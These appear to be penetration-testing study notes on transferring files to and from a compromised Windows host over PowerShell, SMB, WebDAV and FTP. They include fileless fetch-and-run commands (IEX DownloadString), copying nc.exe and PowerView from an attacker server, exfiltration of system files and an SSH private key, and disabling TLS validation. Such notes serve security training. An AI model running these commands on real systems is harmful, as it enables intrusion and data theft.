Windows File Transfer
This sections contains different methods to transfer a file to or from a windows machine.
Transfer File to Target Machine
PowerShell Base64 Encode & Decode
# Pwnbox Check SSH Key MD5 Hash
md5sum id_rsa
# Pwnbox Encode SSH Key to Base64
cat id_rsa |base64 -w 0;echo
# Copy the content and paste in windows powersehll terminal and use some powershel functions to decode it
PS C:\> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1C----0tLQo="))
# We can confirm if the file was transferred successfully using the Get-FileHash cmdlet, which does the same thing that md5sum does.
PS C:\> Get-FileHash C:\Users\Public\id_rsa -Algorithm md5PowerShell Web Downloads
------------------- PowerShell DownloadFile Method ---------------------
PS C:\> # Example: (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
PS C:\> (New-Object Net.WebClient).DownloadFile('<https://URL','C:\PATH')
PS C:\> # Example: (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
PS C:\> (New-Object Net.WebClient).DownloadFileAsync('<https://URL', 'filename.ps1')
---------------- PowerShell DownloadString - Fileless Method ----------------
PS C:\> IEX (New-Object Net.WebClient).DownloadString('<https://URL')
--------------------- PowerShell Invoke-WebRequest -----------------------
# You can use the aliases iwr, curl, and wget instead of the Invoke-WebRequest full name.
PS C:\>Invoke-WebRequest <https://URL/PowerView.ps1> -OutFile PowerView.ps1
# if ps shows error Internet Explorer first-launch configuration has not been completed, it can be bypassed using the parameter -UseBasicParsing.
PS C:\> Invoke-WebRequest https://<ip>/ -UseBasicParsing | IEX
# another error ps shows is related to the SSL/TLS secure channel if the certificate is not trusted
PS C:\> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}SMB Downloads
---- without user/pass
# Create the SMB Server
sudo impacket-smbserver share -smb2support /tmp/smbshare
smbserver.py a -smb2support .
# Copy a File from the SMB Server
C:\> copy \\<ip>\share\nc.exe
---- with user/pass
# Create the SMB Server with a Username and Password
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
smbserver.py a -smb2support . -username tt -password tt
# Mount the SMB Server with Username and Password
C:\\> net use n: \\<ip>\share /user:test test
# other userful comands
net use \\<ip>\share /u:df df # to connect
copy file \\<ip>\share\ # to copy a file
del file
net use /d \\<ip>\share # to delete the share
# note : You can also mount the SMB server if you receive an error when you use `copy filename \\\\IP\\sharename`.FTP Downloads
# Installing the FTP Server Python3 Module - pyftpdlib
sudo pip3 install pyftpdlib
# Setting up a Python3 FTP Server
sudo python3 -m pyftpdlib --port 21
# Transfering Files from an FTP Server Using PowerShell
PS C:\> (New-Object Net.WebClient).DownloadFile('<ftp://<ip>/file.txt>', 'ftp-file.txt')
# If we do not have interactive shell, we can create an FTP command file to download a file.
# Create a Command File for the FTP Client and Download the Target File
---
C:\> echo open <ip> > ftpcommand.txt
C:\> echo USER anonymous >> ftpcommand.txt
C:\> echo binary >> ftpcommand.txt
C:\> echo GET file.txt >> ftpcommand.txt
C:\> echo bye >> ftpcommand.txt
C:\> ftp -v -n -s:ftpcommand.txt
ftp> open <ip>
Log in with USER and PASS first.
ftp> USER anonymous
ftp> GET file.txt
ftp> bye
---Get File from target host to our attack machine
PowerShell Base64 Encode & Decode
# Encode File Using PowerShell
PS C:\> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
# Decode Base64 String in Linux
echo IyBDb3B5cmlnaH-----3N0DQo= | base64 -d > hosts
md5sum hostsPowerShell Web Uploads
# Installing a Configured WebServer with Upload
pip3 install uploadserver
# start a upload server
python3 -m uploadserver
----------- PowerShell Script to Upload a File to Python Upload Server -------
# PSUpload.ps1 : <https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1>
PS C:\> Invoke-FileUpload -Uri <http://<ip>:8000/upload> -File C:\Windows\System32\drivers\etc\hosts
---------------------- PowerShell Base64 Web Upload -----------------------
PS C:\> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
PS C:\> Invoke-WebRequest -Uri <http://192.168.49.128:8000/> -Method POST -Body $b64
# start a listener to get base64 encoded data from target machine and decode it
nc -lvnp 8000
echo <base64> | base64 -d -w 0 > hostsSMB Uploads
# Installing WebDav Python modules
sudo pip install wsgidav cheroot
# Using the WebDav Python module
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
# Connecting to the Webdav Share
C:\> dir \\<ip>\DavWWWRoot
# Uploading Files using SMB
C:\> copy C:\Users\user\Desktop\SourceCode.zip \\<ip>\DavWWWRoot\FTP Uploads
# we need to specify the option --write to allow clients to upload files to our attack host.
sudo python3 -m pyftpdlib --port 21 --write
# use the PowerShell upload function to upload a file to our FTP Server.
PS C:\> (New-Object Net.WebClient).UploadFile('<ftp://<ip>/ftp-hosts>', 'C:\Windows\System32\drivers\etc\hosts')
# Create a Command File for the FTP Client to Upload a File
---
C:\> echo open ip > ftpcommand.txt
C:\> echo USER anonymous >> ftpcommand.txt
C:\> echo binary >> ftpcommand.txt
C:\> echo PUT c:\\windows\\system32\\drivers\\etc\\hosts >> ftpcommand.txt
C:\> echo bye >> ftpcommand.txt
C:\> ftp -v -n -s:ftpcommand.txt
ftp> open ip
Log in with USER and PASS first.
ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
---Last updated